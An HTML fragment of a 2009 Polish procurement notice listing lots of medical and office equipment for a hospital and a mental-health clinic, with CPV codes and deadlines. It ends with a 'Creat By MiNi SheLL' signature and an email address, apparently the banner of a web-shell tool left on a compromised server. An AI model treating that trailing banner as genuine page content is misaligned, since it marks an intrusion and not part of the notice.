<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.3 Wózki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 1.4 Pozostałe wyposażenie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.4 Pozostałe wyposażenie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 1.5 Stół zabiegowy z wyposażeniem - 1 sztuka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.5 Stół zabiegowy z wyposażeniem - 1 sztuka.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 1.6 Lampy medyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.6 Lampy medyczne.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 1.7 Wózki szpitalne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.7 Wózki szpitalne.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 1.8 Waga ze wzrostomierzem - 2sztuk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.8 Waga ze wzrostomierzem - 2sztuk.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 1.9 Materac przeciwodleżynowy trzysekcyjny z pompą do opieki specjalistycznej - 1 sztuka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.9 Materac przeciwodleżynowy trzysekcyjny z pompą do opieki specjalistycznej - 1 sztuka.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 1.10 Meble ze stali kwasoodpornej i nierdzewnej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.10 Meble ze stali kwasoodpornej i nierdzewnej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.31.12-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 1.11 Meble medyczne w systemie stelaża metalowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.11 Meble medyczne w systemie stelaża metalowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.31.12-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 1.12 Meble standardowe i pod zabudowę.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.12 Meble standardowe i pod zabudowę.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 1.13 Metalowe szafy szatniowe.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.13 Metalowe szafy szatniowe.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.31.12-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 1.14 Dozowniki oraz pozostałe wyposażenie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.14 Dozowniki oraz pozostałe wyposażenie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 1.15 Pościel.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.15 Pościel.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 1.16 System pasów do całkowitego unieruchomienia osób agresywnych i pobudzonych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.16 System pasów do całkowitego unieruchomienia osób agresywnych i pobudzonych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 1.17 Aparat Ambu silikonowy - 2 sztuki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.17 Aparat Ambu silikonowy - 2 sztuki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 1.18 Macerator - 2 sztuki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.18 Macerator - 2 sztuki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 1.19 Bieżnia - 1 sztuka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.19 Bieżnia - 1 sztuka.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 1.20 Ciśnieniomierz naramienny elektryczny - 10 sztuk.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.20 Ciśnieniomierz naramienny elektryczny - 10 sztuk.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 1,21 APARAT EKG 12 - kanałowy - szt. 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1,21 APARAT EKG 12 - kanałowy - szt. 1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 1.22 Ssak elektryczny przenośny - 2sztuki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.22 Ssak elektryczny przenośny - 2sztuki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 1.23 Zestaw komputerowy z monitorem.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.23 Zestaw komputerowy z monitorem.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet nr 1.24 Laserowe urządzenie wielofunkcyjne A4 - mono.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.24 Laserowe urządzenie wielofunkcyjne A4 - mono.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet nr 1.25 Niszczarki do dokumentów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.25 Niszczarki do dokumentów.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet nr 1.26 Drukarka komputerowa laserowa - mono sieciowa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.26 Drukarka komputerowa laserowa - mono sieciowa.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet nr 1.27 Wyposażenie medyczne dla Poradni Zdrowia Psychicznego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.27 Wyposażenie medyczne dla Poradni Zdrowia Psychicznego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet nr 1.29 Waga ze wzrostomierzem - 2sztuk dla Poradni Zdrowia Psychicznego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.29 Waga ze wzrostomierzem - 2sztuk dla Poradni Zdrowia Psychicznego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet nr 1.29 Dozowniki oraz pozostałe wyposażenie dla Poradni Zdrowia Psychicznego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.29 Dozowniki oraz pozostałe wyposażenie dla Poradni Zdrowia Psychicznego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet nr 1.30 Meble standardowe i pod zabudowę dla Poradni Zdrowia Psychicznego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.30 Meble standardowe i pod zabudowę dla Poradni Zdrowia Psychicznego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.31.12-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com